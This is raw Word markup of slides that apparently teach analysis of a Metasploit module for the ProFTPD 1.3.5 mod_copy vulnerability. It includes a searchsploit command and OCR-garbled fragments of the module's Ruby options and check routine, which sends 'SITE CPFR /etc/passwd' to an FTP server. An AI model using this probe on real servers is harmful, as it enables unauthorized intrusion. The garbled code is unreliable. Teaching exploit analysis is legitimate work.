                      <v:rect id="Rectangle 123602" o:spid="_x0000_s1056" style="position:absolute;left:58007;top:190;width:13027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zRswwAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0PzD+EO+BuTKeCaDWKjA669AXq7tJc22JzU5qMrX69EQSXh/MeT1tTiivVrrCs4KcbgSBOrS44&#10;U7Df/X0PQDiPrLG0TApu5GA6+fwYY6Jtwxu6bn0mQgi7BBXk3leJlC7NyaDr2oo4cGdbG/QB1pnU&#10;NTYh3JQyjqK+NFhwaMixot+c0sv23yhYDqrZcWXvTVYuTsvD+jCc74Zeqc5XOxuB8NT6t/jlXukw&#10;P+71oxiefwIAOXkAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEARC80bMMAAADfAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="172F07B2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t xml:space="preserve">commands </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123603" o:spid="_x0000_s1057" style="position:absolute;left:68008;width:4286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5H3wwAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0L/ocwwt40XQXRahRRFz2qXXD3NjRjW7aZlCba6q83grDHx/ueL1tTihvVrrCs4HMQgSBOrS44&#10;U/CdfPUnIJxH1lhaJgV3crBcdDtzjLVt+Ei3k89ECGEXo4Lc+yqW0qU5GXQDWxEH7mJrgz7AOpO6&#10;xiaEm1IOo2gsDRYcGnKsaJ1T+ne6GgW7SbX62dtHk5Xb3935cJ5ukqlX6qPXrmYgPLX+X/x273WY&#10;PxyNoxG8/gQAcvEEAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAK2OR98MAAADfAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="7558BA04" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="56"/>
                                </w:rPr>
                                <w:t xml:space="preserve">in </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123604" o:spid="_x0000_s1058" style="position:absolute;left:71342;top:190;width:11760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gmDxQAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCL3VTW0Rja4i2pIcaxRsb0N2TEKzsyG7TdL+elcoeHy879VmMLXoqHWVZQXPkwgEcW51&#10;xYWC0/H9aQ7CeWSNtWVS8EsONuvRwwpjbXs+UJf5QoQQdjEqKL1vYildXpJBN7ENceAutjXoA2wL&#10;qVvsQ7ip5TSKZtJgxaGhxIZ2JeXf2Y9RkMyb7Wdq//qifvtKzh/nxf648Eo9joftEoSnwd/F/+5U&#10;h/nTl1n0Crc/AYBcXwEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCkigmDxQAAAN8AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="5B19B3B0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t xml:space="preserve">ProFTPD </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123605" o:spid="_x0000_s1059" style="position:absolute;left:80200;width:11634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qwYxQAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCL3VTS0Vja4i2pIcaxRsb0N2TEKzsyG7TdL+elcoeHy879VmMLXoqHWVZQXPkwgEcW51&#10;xYWC0/H9aQ7CeWSNtWVS8EsONuvRwwpjbXs+UJf5QoQQdjEqKL1vYildXpJBN7ENceAutjXoA2wL&#10;qVvsQ7ip5TSKZtJgxaGhxIZ2JeXf2Y9RkMyb7Wdq//qifvtKzh/nxf648Eo9joftEoSnwd/F/+5U&#10;h/nTl1n0Crc/AYBcXwEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDLxqwYxQAAAN8AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="5BB2DBBE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="42"/>
                                </w:rPr>
                                <w:t xml:space="preserve">version </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 123606" o:spid="_x0000_s1060" style="position:absolute;left:89154;width:8234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DJvwwAAAN8AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0L/kO4gjtNVShajSI+0OWMCuru0lzbYnNTmmg78/WTgYFZHs57sWpNKd5Uu8KygtEwAkGcWl1w&#10;puBy3g+mIJxH1lhaJgVf5GC17HYWmGjb8Ce9Tz4TIYRdggpy76tESpfmZNANbUUcuIetDfoA60zq&#10;GpsQbko5jqJYGiw4NORY0San9Hl6GQWHabW+He13k5W7++H6cZ1tzzOvVL/XrucgPLX+X/znPuow&#10;fzyJoxh+/wQAcvkDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAOxQyb8MAAADfAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="0ECF668D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="46"/>
                                </w:rPr>
                                <w:t>1.3.5.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</w:tbl>
    <w:p w14:paraId="24D29A59" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="16" w:hanging="10"/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0" wp14:anchorId="2D481A4B" wp14:editId="42258903">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11772900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5000625</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="9525" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="127235" name="Picture 127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5" name="Picture 127235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0" wp14:anchorId="350602CB" wp14:editId="42A60342">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-53339</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1143000</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="10515600" cy="114300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="127206" name="Picture 127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6" name="Picture 127206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8"/>
        </w:rPr>
        <w:t>Analyze the Metasploit module</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="16523" w:type="dxa"/>
        <w:tblInd w:w="-69" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="45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6523"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="1F767E2C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="609"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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E7812D0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="7178"/>
              </w:tabs>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="46"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>root@kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="46"/>
              </w:rPr>
              <w:tab/>
              <w:t>searchsploit -x exploits/1inux/remote/37262. rb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FD311D6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F600CE4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="16" w:hanging="10"/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0" wp14:anchorId="75D7C8D3" wp14:editId="72403C49">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11515725</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5133975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="9525" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="128217" name="Picture 128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7" name="Picture 12821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0" wp14:anchorId="2555C39E" wp14:editId="663E4B0E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11315700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5181600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="9525" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="128218" name="Picture 128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8" name="Picture 128218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8"/>
        </w:rPr>
        <w:t>Important Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DB71FA" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="45"/>
        <w:ind w:left="-84" w:right="-405"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ED23CF0" wp14:editId="6278AFC2">
                <wp:extent cx="10515600" cy="95250"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="340772" name="Group 3407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600" cy="95250"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="10515600" cy="95250"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="340771" name="Shape 340771"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1051560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00" h="95250">
                                <a:moveTo>
                                  <a:pt x="0" y="47625"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="10515600" y="47625"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="952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0772" style="width:828pt;height:7.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="105156,952">
                <v:shape id="Shape 340771" style="position:absolute;width:105156;height:952;left:0;top:0;" coordsize="10515600,95250" path="m0,47625l10515600,47625">
                  <v:stroke weight="7.5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tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="16569" w:type="dxa"/>
        <w:tblInd w:w="-54" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="72" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="279" w:type="dxa"/>
          <w:right w:w="240" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13425"/>
        <w:gridCol w:w="3144"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="529269FA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="3774"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="13425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57B05411" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="332"/>
              <w:ind w:left="315"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>regi ster_options (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2295FE9F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="1515" w:right="3150"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t xml:space="preserve">optport . new( ' RPORT , [true, 'HTTP port', optport . new( ' RPORT_FTP ' , [t rue, FTP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t>21]),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F55E98F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="465"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>OptString. new( ' TARGETURI ' , [true, 'Base path to the website' ,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DEDFDF2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="46"/>
              </w:rPr>
              <w:t>OptString. new( ' TMPPATH ' , [true, ' Absolute writable path', '/tmp' ])'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E341571" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="480" w:right="180" w:firstLine="1035"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">OptString. new( ' </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AFB86F5" wp14:editId="2E754AE8">
                  <wp:extent cx="866775" cy="133350"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="128216" name="Picture 1282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216" name="Picture 128216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2"/>
              </w:rPr>
              <w:t>, [true, 'Absolute writable website path', self. class) end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3144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vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6F27526F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>/var/www' ])</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55F88D30" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Because this operates as a module, it works with (and provides a short description for) some special variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4D3D75" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Remember: this is the Ruby programming language.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64C78151" wp14:editId="54B8F4DD">
            <wp:extent cx="1409700" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="128301" name="Picture 128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1" name="Picture 12830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-684"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="17460" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="173" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="188" w:type="dxa"/>
          <w:right w:w="283" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="989"/>
        <w:gridCol w:w="9388"/>
        <w:gridCol w:w="7083"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="4A6B8689" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1449"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="853" w:type="dxa"/>
            <w:vMerge w:val="restart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1D3B953C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="80"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1660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1D8EF93" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="842" w:right="3332" w:hanging="660"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>def check ftp_port = datastore[ ' RPORT_FTP' sock = Rex: : Socket. 'PeerHost rhost, ' PeerPort ' ftp_port)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="17E7ED7A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="660"/>
        </w:trPr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1A150F16" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16607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4F08640" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="842"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>if sock. nil?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A5B1521" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="3699"/>
                <w:tab w:val="center" w:pos="11379"/>
              </w:tabs>
              <w:spacing w:after="191"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t>fail_with(Fai1ure: : Unreachable,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t>rhost} :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5696A677" wp14:editId="6C7CF773">
                  <wp:extent cx="1143000" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="129981" name="Picture 1299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981" name="Picture 129981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2"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Failed to connect to FTP server")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6346383A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="842" w:right="4517" w:firstLine="330"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t>print_ status( rhost}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="112DD6EA" wp14:editId="269A8449">
                  <wp:extent cx="1209675" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="129982" name="Picture 1299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982" name="Picture 129982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4"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Connected to FTP server") end</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="4126ECF3" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1515"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="853" w:type="dxa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14:paraId="378E2415" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="1080"/>
              <w:ind w:left="285"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="66"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="630B0D66" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="270"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="76"/>
              </w:rPr>
              <w:t>3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0DDEBE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="2380A275" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1275"/>
        </w:trPr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0D5CFC86" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="943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435056C7" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="842" w:right="257" w:firstLine="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">res = sock. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10D19D9E" wp14:editId="5498799C">
                  <wp:extent cx="1152525" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="129875" name="Picture 1298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75" name="Picture 129875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0"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10) unless res &amp;&amp; res. include? ('220' ) fail_with(Fai1ure: : Unknown, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="787E2CE3" wp14:editId="1B8CEACA">
                  <wp:extent cx="1962150" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="129876" name="Picture 1298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76" name="Picture 129876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0"/>
              </w:rPr>
              <w:t>end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7170" w:type="dxa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bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7C1DEFAC" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t>- Failure retrieving ProFTPD 220 banner")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="6FAA058E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="853" w:type="dxa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18E5177B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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27C28D45" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc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6DB263C2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="5C69BCE4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1350"/>
        </w:trPr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68A410FE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="943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92CDC94" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="857" w:right="2102"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>sock. puts("SITE CPFR /etc/passwd\r\n") res = sock. 10) if res &amp;&amp; res. include? 350' )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="491700B8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="16"/>
              <w:ind w:left="1187"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t>Exploit: : CheckCode: : Vulnerable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12835C80" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="347" w:right="4052" w:firstLine="840"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t>Exploit: : CheckCode: : Safe end end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
